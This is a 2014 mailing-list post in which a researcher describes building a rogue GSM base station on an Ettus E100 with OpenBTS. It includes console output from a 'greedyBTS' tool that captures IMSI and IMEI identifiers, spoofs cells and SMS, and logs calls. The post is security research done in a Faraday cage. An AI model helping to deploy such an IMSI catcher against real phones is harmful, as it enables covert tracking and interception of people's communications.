OpenBTS / E100 & GSM attacks.
Hacker Fantastic
hackerfantastic at googlemail.com
Fri Feb 7 14:12:26 CET 2014
Hi all,
My first attempt to send this email didn't appear to succeed so I
am re-sending without attachment. Here is a copy of some slides
https://github.com/HackerFantastic/Public/blob/master/presentations/mwri_labs-GSM-Hacking-Wireless-Mobile-Phone-Communication_2014-01-30.pdfI
wrote for a presentation on security weaknesses within GSM. I used an
Ettus E100 to develop a malicious BTS and GSM related attacks in a Faraday
cage and presented on how these attacks work to better understand them for
defensive purposes. I was able to use the E100 as a generic IP-router after
I cross-compiled a new kernel with netfilter enabled and also I had to
recompile a number of the packages such as Asterisk to enable ODBC and
improved SQLite support, I also had to make some changes to Python and its
modules. I used GNURadio 3.6.4 and I had to compile a specific version of
the OpenBTS code as the recent transceiver application did not function
with the E100. I was able to get the E100 to work as a GSM/GPRS router and
do real-time call placement etc. I got it to function with real-time
support and wrote a small script to provision new devices by watching the
syslog and adding to the SQLite database.
I also used osmocom-bb to do things like use gnuplot and graph the channel
usage although the code is extremely ugly! I took RSSI measurements over a
period of time into images and then tied them together for a movie, it
isn't quite realtime but it makes pretty graphs. I mentioned how you could
implement the MS side of the GSM stack using the osmocom project and as
such am sharing the slides with the osmocom list.
Just goes to show how mighty things come in small packages! Hope this
material is useful to others on the list who may also be trying similar
experiments. I ended up creating a firmware image that could be used to dd
and boot an E100 but at this time I do not plan on hosting it for download
unless there is sufficient interest. If you need it for some reason drop me
an e-mail.
Here is an example of the output of the greedyBTS script. As an example my
code plays "Rick Astley - never going to give you up" when a user places a
phone call and they have been provisioned with service. All of this work
was done in a faraday cage which I obtained from Ramsey electronics which
had very good frequency attenuation graph from 0mhz all the way to 1ghz.
root at usrp-e1xx:~# ./launch.sh
Launching asterisk
Launching HLR SMS
Launching OpenBTS
Launching Greedy BTS..
888 888 d8
e88 888 888,8, ,e e, ,e e, e88 888 Y8b Y888P 888 88e d88 dP"Y
d888 888 888 " d88 88b d88 88b d888 888 Y8b Y8P 888 888b d88888 C88b
Y888 888 888 888 , 888 , Y888 888 Y8b Y 888 888P 888 Y88D
"88 888 888 "YeeP" "YeeP" "88 888 888 888 88" 888 d,dP
, 88P 888 pDK++
"8",P" 888
[+] Current CELL configuration
[-] ==========================
[-] Shortname: 'Noone'
[-] MCC: 901 MNC: 70 C0 ARFCN: 51
[-] LAC: 3336 ARFCN's: 1 BAND: 900
[-]
[-] Radio Power
[-] ===========
[-] RxGain: 47 MaxPower: 10 MinPower: 0
--> help
[+] HELP SCREEN
[-] dump imei - lists all identified IMEI
[-] dump assoc - lists all IMEI+IMSI associations
[-] dump imsi - lists all identified IMSI
[-] dump save - store a record of all identities
[-] start service - provide service to IMSI & log traffic
[-] show service - show all provisioned phones
[-] stop service - deletes an identified IMSI from HLR
[-] calls - provide call collection statistics
[-] sms - provide sms collection statistics
[!] gprs - provide gprs collection statistics
[-] cellconfig - configure cell parameters for spoofing
[-] cellinfo - dump information on current cell
[-] cellshow - list short codes for common cells
[!] sounddial - play a sound recording to an IMSI
[!] spoofsms - send a spoof SMS message to an IMSI
[!] trunksetup - display current SIP trunk details
[-] verbose - turn on real time tracing
[-] exit - leave without shutdown
[-] shutdown - bye!
--> dump imei
[+] Dumping seen handset IMEI
[-] 1: IMEI359209002648230
[-] 2: IMEI358622002760070
[-] 3: IMEI350694801239040
[-] Total IMEI identified 3
--> dump imsi
[+] Dumping IMSI capture results
[-] 1: IMSI901700000002484
[-] 2: IMSI901700000002486
[-] 3: IMSI901700000002488
[-] Total IMSI identified 3
--> dump assoc
[+] Dumping IMSI/IMEI association
[-] 1 IMEI:358622002760070 used IMSI901700000002486
[-] 2 IMEI:350694801239040 used IMSI901700000002488
[-] Total associations 2
--> show service
[+] Displaying all provisioned IMSI
[-] 1: exten: 2100 user: IMSI001010000000000
[-] 2: exten: 2339 user: IMSI901700000002484
[-] Total subscriber count 2
--> stop service
[+] Deleting IMSI from HLR
[-] Enter IMSI: IMSI901700000002484
[-] Deleted IMSI901700000002484
--> help
[+] HELP SCREEN
[-] dump imei - lists all identified IMEI
[-] dump assoc - lists all IMEI+IMSI associations
[-] dump imsi - lists all identified IMSI
[-] dump save - store a record of all identities
[-] start service - provide service to IMSI & log traffic
[-] show service - show all provisioned phones
[-] stop service - deletes an identified IMSI from HLR
[-] calls - provide call collection statistics
[-] sms - provide sms collection statistics
[!] gprs - provide gprs collection statistics
[-] cellconfig - configure cell parameters for spoofing
[-] cellinfo - dump information on current cell
[-] cellshow - list short codes for common cells
[!] sounddial - play a sound recording to an IMSI
[!] spoofsms - send a spoof SMS message to an IMSI
[!] trunksetup - display current SIP trunk details
[-] verbose - turn on real time tracing
[-] exit - leave without shutdown
[-] shutdown - bye!
--> dump imei
[+] Dumping seen handset IMEI
[-] 1: IMEI359209002648230
[-] 2: IMEI358622002760070
[-] 3: IMEI350694801239040
[-] Total IMEI identified 3
--> dump imsi
[+] Dumping IMSI capture results
[-] 1: IMSI901700000002484
[-] 2: IMSI901700000002486
[-] 3: IMSI901700000002488
[-] Total IMSI identified 3
--> dump assoc
[+] Dumping IMSI/IMEI association
[-] 1 IMEI:358622002760070 used IMSI901700000002486
[-] 2 IMEI:350694801239040 used IMSI901700000002488
[-] Total associations 2
--> dump save
[+] Saving IMSI capture results
[+] Saving seen handset IMEI
[+] Saving IMSI/IMEI association
[-] logfile stored as 'greedybts.log'
--> shutdown
root at usrp-e1xx:~# cat greedybts.log
[-] 1: IMSI901700000002484
[-] 2: IMSI901700000002486
[-] 3: IMSI901700000002488
[-] Total IMSI identified 3
[-] 1: IMEI359209002648230
[-] 2: IMEI358622002760070
[-] 3: IMEI350694801239040
[-] Total IMEI identified 3
[-] 1 IMEI:358622002760070 used IMSI901700000002486
[-] 2 IMEI:350694801239040 used IMSI901700000002488
[-] Total associations 2
Kind Regards,
Matthew
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.osmocom.org/pipermail/baseband-devel/attachments/20140207/32a2f49c/attachment.html>
More information about the baseband-devel
mailing list